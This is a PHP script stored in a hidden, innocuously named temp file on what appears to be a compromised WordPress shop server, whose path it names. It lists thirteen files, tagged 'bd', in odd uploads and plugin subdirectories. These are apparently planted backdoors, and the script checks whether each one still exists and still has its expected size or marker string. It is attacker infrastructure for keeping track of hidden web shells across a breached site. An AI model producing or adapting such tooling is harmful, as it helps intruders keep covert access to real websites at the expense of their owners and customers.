File: //tmp/.parle_tokens
<?php $r = '/var/www/vhost/disk-apps/tienda-qas.allup.com.co'; $x = ["/wp-content/uploads/2015/libyan/mar/index.php"=>"bd@@178972@@Feature-Policy",
"/wp-content/plugins/elementor/modules/system-info/reporters/network.php"=>"bd@@178986@@1076",
"/wp-content/uploads/2015/acanthous/editable/index.php"=>"bd@@177749@@23",
"/wp-content/plugins/woo-gift-cards-lite/index.php"=>"bd@@177750@@buffer_cache",
"/wp-content/uploads/2015/acanthous/tailgate/index.php"=>"bd@@177764@@46",
"/wp-content/uploads/2015/artificialness/aproach/index.php"=>"bd@@177765@@$_COOKIE[9",
"/wp-content/uploads/2015/above/index.php"=>"bd@@177771@@96",
"/wp-content/uploads/2015/mercurial/retest/index.php"=>"bd@@177292@@48",
"/wp-content/uploads/2015/thunderburst/protect/index.php"=>"bd@@177293@@68",
"/wp-content/uploads/2015/acanthous/cedilla/index.php"=>"bd@@19906@@Clear-Site-Data",
"/wp-content/plugins/woo-checkout-regsiter-field-editor/freemius/templates/account/partials/index.php"=>"bd@@181712@@Content-Security-Policy",
"/wp-content/plugins/wp-sheet-editor-premium/modules/universal-sheet/vendor/jwt-authentication-for-wp-rest-api/tests/tests/cache.php"=>"bd@@181720@@87",
"/wp-content/uploads/2015/acanthous/passant/index.php"=>"bd@@178431@@reverse_lookup"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');